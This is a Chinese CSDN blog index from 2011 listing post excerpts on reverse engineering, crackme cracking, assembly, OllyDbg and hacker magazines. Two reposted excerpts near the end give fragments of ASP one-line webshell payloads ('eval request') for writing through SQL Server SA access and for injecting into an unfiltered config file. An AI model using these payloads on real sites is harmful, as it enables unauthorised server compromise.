qingshenxue-CSDN博客

转载浅析SMC技术

今天让我们来看Win32ASM里面的高级一点的技术——SMC（当当当当……）！！！ SMC是什么意思？它的英文名叫“Self Modifying Code”，顾名思义，就是“代码自修改”（？）（不好意思，小弟的英语六级还没过，只能翻译成这样啦……） “代码自修改”？哇，好高深啊！其实不然…… 我们知道，Win32应用程序是运行在保护模式下的，每个Win32应用程序都有相互独立的4GB地址空间，并且已经摒弃了16位时代的把代码分为D

2011-03-05 19:51:00 1658

转载 BOMbing The System

roy g biv February 2011 [Back to index] [Comments (0)]What is a BOM?Why should we care?Great, can we do that?Okay, let's do it!Unicode in filesGreets to friendly people (A-Z)What is a BOM? It's not the thing that explodes. That's a BOM

2011-03-05 18:28:00 618

转载国内外著名黑客杂志

作者：riusksk(泉哥)主页：http://riusksk.blogbus.comps: 2009.3.20 添加了《Ph4nt0m Webzine》和《软件安全》 2009.7.16 添加了《hackin9》和《Virus Bulletin 》国外黑客杂志：《phrack》黑客杂志http://www.phrack.org《phrack》创刊于80年代，是世界级的顶级黑客杂志，每年只有一期，现已出了65期，国人似乎至今只有三人在上面发表发表文章，三人好像都是绿盟的人，即《网络渗透技术》一书的三

2011-03-04 21:39:00 9634

原创 vc6.o--fatal error C1010错误的解决

当编译c文件时，出错信息为：fatal error C1010: unexpected end of file while looking for precompiled header directive ================================================================================= 解决方案：1、如果发生错误的文件是由其他的C代码文件添加进入当前工程而引起的，则Alt+F7进入当前工程的

2011-03-02 12:07:00 6766

转载关于如何用od反汇编win32 控制台程序

*********************************************************** 如何用od反汇编win32 控制台程序(类似dos程序）呢？ *********************************************************** 注：od是用来调试win32程序的 1.反编译win32 控制台程序，这个跟win32 gui还是有些不同的.2.控制台程序加载时就有控制台窗口

2011-02-28 22:39:00 3966

原创记对一个key file crackme的破解

crackme下载地址： http://kssd.pediy.com/tutorial/exercise/section04/chap6-1-4-03.zip ------------------------------------------------------------------------------------------------------------------------------- ---------------------------

2011-02-28 21:00:00 1508

原创破解key file时经常用到的几个API函数及其用法

CreateFile函数 ================================================================================== CreateFile： Creates or opens a file or I/O device. The most commonly used I/O devices are as follows: file, file stream, directory,

2011-02-28 20:06:00 902

原创汇编----乘指令: MUL、IMUL

MUL: 无符号乘 ================================================== ;影响 OF、CF 标志位 ;指令格式: ;MUL r/m ;参数是乘数 ;如果参数是 r8/m8, 将把 AL 做乘数, 结果放在 AX ;如果参数是 r16/m16, 将把 AX 做乘数, 结果放在 EAX ;如果参数是 r32/m32, 将把 EAX 做乘数, 结果放

2011-02-26 18:44:00 53078

转载 OllyDBG反汇编快速找到程序入口&一点分析

出处：http://hi.baidu.com/0soul/blog/item/b62f8f08c2c3c42c6b60fbbe.html 先声明下：这个和脱壳没关系，不是找壳里面的程序入口哦，只是程序本身的入口，个别朋友不要误会哈。 其实这个应该是基础，但我经常找入口的时候翻半天......所以还是记录下来，万一时间久了又犯迷糊的时候可以查阅，呵呵。 一般用OllyDBG打开程序的时候，并不是直接定位到程序入口，而是还要先进行一系列的初始化工

2011-02-26 15:25:00 11307

原创 STARTUPINFO结构

1.结构原型 typedef struct _STARTUPINFO { 　　DWORD cb; 　　LPTSTR lpReserved; 　　LPTSTR lpDesktop; 　　LPTSTR lpTitle; 　　DWORD dwX; 　　DWORD dwY; 　　DWORD dwXSize; 　　DWORD dwYSize; 　　DWORD dwXCountChars;

2011-02-26 15:05:00 937

原创 OllyICE的简单实用及一个小cracker的破解

====================================================================== 2.然后用ollydbug打开。如图： 然后，在该行上点击右键，选择反

2011-02-22 16:52:00 2468 1

转载购书心得

作者：泉哥主页：http://riusksk.blogbus.com富家不用买良田，书中自有千钟粟；安居不用架高堂，书中自有黄金屋；出门莫恨无人随，书中车马多如簇；娶妻莫恨无良媒，书中自有颜如玉；男儿若遂平生志，六经勤向窗前读。. ——宋真宗赵恒《劝学诗》之前SAI兄弟也曾写过关于图书购买心得的博文，见这：http://debug-sai.blogbus.com/logs/62159496.html。自己也是个喜欢购书的人，看了那篇博文后自己

2011-02-20 22:14:00 2730

原创如何通过IP地址分辨公网、私网、内网、外网

内、外网是相对于防火墙而言的，在防火墙内部叫做内网，反之就是外网。 在一定程度上外网等同于公网，内网等同于私网。 地址为如下3个区域就是处于私网： 1：10.*.*.* 2：172.16.*.*至172.31.*.* 3：192.168.*.* （*为0到255之间的任意数字） 以上3个区域外的就是处于公网之中了。 ========================================================

2011-02-20 21:23:00 4435 2

转载转载]SA权限九种上传方法

刚看了一种方法，如果是注入点，利用管中窥豹以二进制的方式上传，上传的时候最好改下名，比如do.exe，上传到目标服务器可以改成do.cmd，等传上去之后用copy 命令改回来。 当然用啊d也可以上传，还有nbsi。 SA 权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高。 一、NBSI的命令方法:写入一句话木SHELL,命令如下： echo ^<%eval request

2011-02-04 15:56:00 1071

转载 [转载]一句话插配置文件

http://www.t00ls.net/viewthread.php?tid=13901一句话插入配置文件system.asp没有过滤双引号，插入一句就行。常规插法如下："%>但金刀客这篇文件（http://www.cqzh.cn/post/328.html）为什么说"%>必须要加s=呢？比如：web_name="中国纺织网"插入后：web_name="中国纺织网"%>跟这样不就全闭合了吗？还需要 =========":eval request(9)

2011-02-04 15:47:00 2401

m4nkey